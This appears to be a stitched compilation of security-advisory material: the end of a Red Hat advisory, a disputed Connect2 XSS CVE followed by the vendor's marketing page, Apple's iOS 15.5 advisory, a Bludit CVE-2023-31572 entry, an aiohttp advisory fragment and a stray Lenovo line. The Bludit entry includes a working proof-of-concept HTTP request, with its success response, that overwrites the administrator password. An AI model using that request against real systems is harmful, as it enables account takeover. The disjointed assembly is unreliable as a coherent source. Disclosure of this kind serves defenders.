4. Bugs fixed (https://bugzilla.redhat.com/):

2052573 - CVE-2022-24450 nats-server: misusing the "dynamically provisioned sandbox accounts" feature  authenticated user can obtain the privileges of the System account  
2087686 - Can't install submariner add-ons from UI on unsupported cloud provider  
2088270 - policy controller addons are Progressing status (unhealthy from backend)  on OCP3.11 in ARM hub  
2090802 - RHACM 2.5.1 images  
2095333 - Broken link to Submariner manual install instructions  
2096389 - `The backend service is unavailable` when accessing ACM 2.5 Overview page  
2101453 - 64 character length causing clusters to unsubscribe

5. References:

https://access.redhat.com/security/cve/CVE-2020-28915  
https://access.redhat.com/security/cve/CVE-2021-3695  
https://access.redhat.com/security/cve/CVE-2021-3696  
https://access.redhat.com/security/cve/CVE-2021-3697  
https://access.redhat.com/security/cve/CVE-2021-40528  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-1621  
https://access.redhat.com/security/cve/CVE-2022-1629  
https://access.redhat.com/security/cve/CVE-2022-22576  
https://access.redhat.com/security/cve/CVE-2022-24450  
https://access.redhat.com/security/cve/CVE-2022-25313  
https://access.redhat.com/security/cve/CVE-2022-25314  
https://access.redhat.com/security/cve/CVE-2022-27666  
https://access.redhat.com/security/cve/CVE-2022-27774  
https://access.redhat.com/security/cve/CVE-2022-27776  
https://access.redhat.com/security/cve/CVE-2022-27782  
https://access.redhat.com/security/cve/CVE-2022-28733  
https://access.redhat.com/security/cve/CVE-2022-28734  
https://access.redhat.com/security/cve/CVE-2022-28735  
https://access.redhat.com/security/cve/CVE-2022-28736  
https://access.redhat.com/security/cve/CVE-2022-28737  
https://access.redhat.com/security/cve/CVE-2022-29824  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuFkcNzjgjWX9erEAQjDyQ/+NnBYxdKnS5ca3caODHe8GRwu1PAreIh1  
Y1gZ1mMf8lNt+hWnoNgpRJuhEKHAOLy6PYp3htaBAdhnHSvKCMKEpvpZkxv3Oe1A  
tGvAYxgbu7kKHYtnWR0FUEcgTGtgRFEC1e53wybj1JzwyQL8Pr9G4JaAOHzLtPov  
9gHw4p/UWa+u/FVIM5+lA7w7yxW8pfmrgxqfN6DJ61vNkiS4fBbKn70pwlY+95Ww  
0fDQbm3/+OZ/vp9qUJTMX2VHaH7gFAaseiAMJi1KRCG/Younwgu5JBz/CSSfC+p2  
n7odSyK2yGTq81IJ84CVjlYIVqvdsvra6dXOLkxoZ8BLbqkw9RJXKcKcZ11x+uPu  
gA6gr873UcPy7ek749Yyt4M86DcfnD/epX0a8fmXVP1y7OQKU/o/VtnJaM5n6vYE  
ffmH94aNBRNHaoJe4DtaCuPnVG49Q1YbAjcvbpBFyJieNoI923iuM16+ufAg5fh3  
hvEkmIbrxVZpsOJ0TgDpl0uqZq0FryyKhzX/exL+n1NAiPoivNm2QNmghsIxK/cW  
/hsgI6tVjLFdythluNz7DUWxJK2amB1KHqJey5U+oP0kA315QHfo35Bze6SXpW3L  
IkaDhpm/Pgs8vVQElpwVqUlypBqxoDJMEOs7tXIY6Km7TXM8qV2GD1+xAgolJCYv  
oclUMcfx218=  
=lDGo  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5531-01

** DISPUTED ** Lorensbergs Connect2 3.13.7647.20190 is affected by an XSS vulnerability. Exploitation requires administrator privileges and is performed through the Wizard editor of the application. The attack requires an administrator to go into the Wizard editor and enter an XSS payload within the Page title, Page Instructions, Text before, Text after, or Text on side box. Once this has been done, the administrator must click save and finally wait until any user of the application performs a booking for rental items in the booking area of the application, where the XSS triggers. NOTE: another perspective is that the administrator may require JavaScript to customize any aspect of the page rendering. There is no effective way for the product to defend users in the face of a malicious administrator.

For easier access and clear presentation of all student resources and services, institutions rely on the leading online booking software, connect2. Highly flexible and customisable, it showcases your resources to best effect, streamlines their administration, and supports both students and staff with its intuitive interface and stress-free booking process.

*   Features
*   Case Studies
*   Demo

**Feature highlights**

![connect2 equipment booking system on a tablet computer](https://www.lorensbergs.co.uk/media/25442/tablet-with-connect2-equipment-booking-system.jpg)

**Single booking system**

The extensive functionality in connect2 makes it suitable for all of the following:

*   Resource bookings – with the ability to manage large portfolios of equipment for online reservation
*   Rapid checkout/in workflows – highly developed for busy media and equipment stores to save time and ensure accuracy
*   Simple inventory management – for information on status, location, usage and condition of all items at any time
*   Room bookings – for managing fair access and maximising usage of all spaces  
    

![Students in a library. Girl on her tablet computer](https://www.lorensbergs.co.uk/media/25443/online-booking-interface.jpg)

**Online booking interface**

The clean, easy-to-use interface enables students to browse and view the resources or services they are authorised to book. The booking process is quick and intuitive, encouraging advance bookings and enabling students to be better organised. Inclusion of further resource information, and dynamic search fields by resource type, helps students to choose the best items to meet their needs.

Bookings are manageable online 24/7, so students can alter times or items booked, renew or cancel bookings as needed.

![Computer tablet, camera and video camera](https://www.lorensbergs.co.uk/media/25444/resource-tracking-and-management.jpg)

**Resource tracking and management**

Connect2 provides a clear and accurate overview of resource availability and location at all times, for efficient resource management. Service and repair history and other data can be added to each resource - keeping all equipment information in one central and backed up system.

It offers clear overviews of bookings giving staff the ability to plan resourcing, prepare kit for checkout or manage late returns. New inventory is easily uploaded using connect2 import tools.

Further information on connect2 for resource booking, tracking and management is available here.

![Three young students sat around a computer](https://www.lorensbergs.co.uk/media/25445/communication.jpg)

**Communication and messaging**

Automatic messaging in connect2 keep students informed about their bookings. It also encourages good attendance and responsible borrowing, with staff spending less time pursuing late returns or following up on no-shows.

Clarity of booking rules for each resource, with terms and conditions of use, support students in knowing what’s expected of them and for better management of their schedules. A personal homepage for each student helps to keep them informed and organised.

![No access sign](https://www.lorensbergs.co.uk/media/25446/booking-rules-and-permissions.jpg)

**Booking rules and permissions**

Connect2 makes it possible to apply different booking rules and calendars for different types of users, resources or sites. Usage can be optimised to make the most of limited services and resources with booking rules easily flexed as needed. Rules are clearing displayed at the point of booking for better user communication. If a submitted booking breaks a rule, the system suggests alternative timeslots to the user to help them complete their booking.

Booking permissions can be applied by course or year of study, with all students and staff authenticated via connection to Active Directory or another central database. In this way, the service you offer can be tailored for your students. Single Sign-on (SSO) is available, supported via Shibboleth.

![Magnifying glass on top of a report graphic](https://www.lorensbergs.co.uk/media/25447/roi-analysis.jpg)

**ROI analysis**

Institutions use the reporting available in connect2 to make better purchase and resourcing decisions. The data allows them to demonstrate utilisation of popular items or lack of demand for other resources, so they make wiser investment decisions and are more successful in requests for funding. Valuable reports can be created in seconds through the centralised system. Efficient staffing schedules can also be determined using future bookings data.

**Case Studies**

**Case Study: connect2 at SUNY Fredonia**

The State University of New York (SUNY) at Fredonia is a four-year liberal arts college. It is a constituent college of the State University of New York, best known for its bachelor's degree programs in music and education.

Read more

  

**Want to see more?**

Contact us for a no-obligation personalised connect2 demo.

Request a demo

CVE-2021-43960: Connect2 online booking system | Academic resources

Apple Security Advisory 2022-05-16-1 - iOS 15.5 and iPadOS 15.5 addresses bypass, code execution, denial of service, integer overflow, out of bounds access, out of bounds write, and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-05-16-1 iOS 15.5 and iPadOS 15.5iOS 15.5 and iPadOS 15.5 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213258.AppleAVDAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A use after free issue was addressed with improvedmemory management.CVE-2022-26702: an anonymous researcherAppleGraphicsControlAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing a maliciously crafted image may lead to arbitrarycode executionDescription: A memory corruption issue was addressed with improvedinput validation.CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero DayInitiativeAVEVideoEncoderAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: An out-of-bounds write issue was addressed with improvedbounds checking.CVE-2022-26736: an anonymous researcherCVE-2022-26737: an anonymous researcherCVE-2022-26738: an anonymous researcherCVE-2022-26739: an anonymous researcherCVE-2022-26740: an anonymous researcherDriverKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious application may be able to execute arbitrary codewith system privilegesDescription: An out-of-bounds access issue was addressed withimproved bounds checking.CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)GPU DriversAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A memory corruption issue was addressed with improvedstate management.CVE-2022-26744: an anonymous researcherImageIOAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A remote attacker may be able to cause unexpected applicationtermination or arbitrary code executionDescription: An integer overflow issue was addressed with improvedinput validation.CVE-2022-26711: actae0n of Blacksun Hackers Club working with TrendMicro Zero Day InitiativeIOKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A race condition was addressed with improved locking.CVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu LabIOMobileFrameBufferAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A memory corruption issue was addressed with improvedstate management.CVE-2022-26768: an anonymous researcherIOSurfaceAcceleratorAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious application may be able to execute arbitrary codewith kernel privilegesDescription: A memory corruption issue was addressed with improvedstate management.CVE-2022-26771: an anonymous researcherKernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A memory corruption issue was addressed with improvedvalidation.CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs(@starlabs_sg)KernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A use after free issue was addressed with improvedmemory management.CVE-2022-26757: Ned Williamson of Google Project ZeroKernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An attacker that has already achieved kernel code executionmay be able to bypass kernel memory mitigationsDescription: A memory corruption issue was addressed with improvedvalidation.CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)KernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious attacker with arbitrary read and write capabilitymay be able to bypass Pointer AuthenticationDescription: A race condition was addressed with improved statehandling.CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)LaunchServicesAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A sandboxed process may be able to circumvent sandboxrestrictionsDescription: An access issue was addressed with additional sandboxrestrictions on third-party applications.CVE-2022-26706: Arsenii Kostromin (0x3c3e)libxml2Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A remote attacker may be able to cause unexpected applicationtermination or arbitrary code executionDescription: A use after free issue was addressed with improvedmemory management.CVE-2022-23308NotesAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing a large input may lead to a denial of serviceDescription: This issue was addressed with improved checks.CVE-2022-22673: Abhay Kailasia (@abhay_kailasia) of Lakshmi NarainCollege Of Technology BhopalSafari Private BrowsingAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious website may be able to track users in Safariprivate browsing modeDescription: A logic issue was addressed with improved statemanagement.CVE-2022-26731: an anonymous researcherSecurityAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious app may be able to bypass signature validationDescription: A certificate parsing issue was addressed with improvedchecks.CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)ShortcutsAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A person with physical access to an iOS device may be able toaccess photos from the lock screenDescription: An authorization issue was addressed with improved statemanagement.CVE-2022-26703: Salman Syed (@slmnsd551)WebKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing maliciously crafted web content may lead to codeexecutionDescription: A memory corruption issue was addressed with improvedstate management.WebKit Bugzilla: 238178CVE-2022-26700: ryuzakiWebKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A use after free issue was addressed with improvedmemory management.WebKit Bugzilla: 236950CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghuawingtecher labWebKit Bugzilla: 237475CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghuawingtecher labWebKit Bugzilla: 238171CVE-2022-26717: Jeonghoon Shin of TheoriWebKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory corruption issue was addressed with improvedstate management.WebKit Bugzilla: 238183CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun LabWebKit Bugzilla: 238699CVE-2022-26719: Dongzhuo Zhao working with ADLab of VenustechWebRTCAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Video self-preview in a webRTC call may be interrupted if theuser answers a phone callDescription: A logic issue in the handling of concurrent media wasaddressed with improved state handling.WebKit Bugzilla: 237524CVE-2022-22677: an anonymous researcherWi-FiAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious application may disclose restricted memoryDescription: A memory corruption issue was addressed with improvedvalidation.CVE-2022-26745: an anonymous researcherWi-FiAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious application may be able to elevate privilegesDescription: A memory corruption issue was addressed with improvedstate management.CVE-2022-26760: 08Tc3wBB of ZecOps Mobile EDR TeamWi-FiAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A remote attacker may be able to cause a denial of serviceDescription: This issue was addressed with improved checks.CVE-2015-4142: Kostya Kortchinsky of Google Security TeamWi-FiAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious application may be able to execute arbitrary codewith system privilegesDescription: A memory corruption issue was addressed with improvedmemory handling.CVE-2022-26762: Wang Yu of CyberservalAdditional recognitionAppleMobileFileIntegrityWe would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRingfor their assistance.FaceTimeWe would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRingfor their assistance.WebKitWe would like to acknowledge James Lee, an anonymous researcher fortheir assistance.Wi-FiWe would like to acknowledge 08Tc3wBB of ZecOps Mobile EDR Team fortheir assistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.5 and iPadOS 15.5".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TQACgkQeC9qKD1prhh9PRAApeuHnWvZRxSW/QArItDF2fA1eXCu7n9BwPA6CoqrU7v7aR6H/NQ3wes6xOjoRccHRCWRJ12RubM06ggC+WA/MLb96t2Wc4IUoFDkI3G6fp/I3aHpSONv4YMtEoHSGMpJ3qAb6Z60mIMcshsCtyv9k4LxpjOTnHKRLp/M4JLWG4CanOGpN2u/wPPVTpRY4jkZlAdvQK3qrPmA8aO5sWnbh5l//kUS6IL649seZQFUeZdz7QUyodjjqr2/XWyqsQC4mqVphxwvWDWA5J6/Zf7C7hNdZ1BE+SPpLhjEZlU6IYBFY2PLrg9NDTv8YMZpftlm5HQo3qmy/HLoiF8bIqgtdz+TpgNiT+TYz9+/pvP/hyGbX6xF9esKBVjj+1OUnd2GaLjSdY7o9WOtZgSJQxi1/R1X1+DjY1vI+d/TQZ+Sz58Me90R99aWc+Gc1B8e6FhjwT48rHJiuIw75ZW1orpUX6OL5vqdge0H1aJXm7EEUhByZvm2E2DajKu2mp2jr01UZyb3ro0qE1zpNitNORWAdvrlriIJxFVxtxW4MygMn8ThJ/Jz2LjquHvTEwvCyB9jaqPKja3b/dwzf/nowjw+aocxOjelW2Q/HcyR13YF2ZHd1+hNtG/7IsrxWIpI9nNAQQ2LCQIgL7/xCn6Yni9t3le3+eU+cdafoqJKTpETNbk==OMfW-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-1

An issue in Bludit 4.0.0-rc-2 allows authenticated attackers to change the Administrator password and escalate privileges via a crafted request.

The already authenticated attacker can send a normal request to change his password and then he can use the same JSON object and the vulnerable API token KEY in the same request to change the admin account password. Then he can access the admin account and he can do very malicious stuff.

    PUT /api/users/admin HTTP/1.1
    Host: 127.0.0.1:8000
    Content-Length: 138
    sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
    sec-ch-ua-platform: "Windows"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
    content-type: application/json
    Accept: */*
    Origin: http://127.0.0.1:8000
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:8000/admin/edit-user/pwned
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui
    Connection: close
    
    {"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}
    
    

HTTP/1.1 200 OK
Host: 127.0.0.1:8000
Date: Tue, 11 Apr 2023 08:33:51 GMT
Connection: close
X-Powered-By: PHP/7.4.30
Access-Control-Allow-Origin: \*
Content-Type: application/json

{"status":"0","message":"User edited.","data":{"key":"admin"}}

CVE-2023-31572: CVE-nu11secur1ty/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2 at main · nu11secur1ty/CVE-nu11secur1ty

aiohttp v3.8.1 was discovered to contain an invalid IPv6 URL which can lead to a Denial of Service (DoS).

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-33124

**Denial of Service in aiohttp**

Moderate severity GitHub Reviewed Published Jun 24, 2022 • Updated Jun 25, 2022

We are still processing this advisory. You may have affected repositories that are not yet on this list. Check back soon for more.

**Package**

pip aiohttp (pip)

**Affected versions**

<= 3.8.1

**Description**

Search

lenovo warranty check/lookup | check warranty status | lenovo support us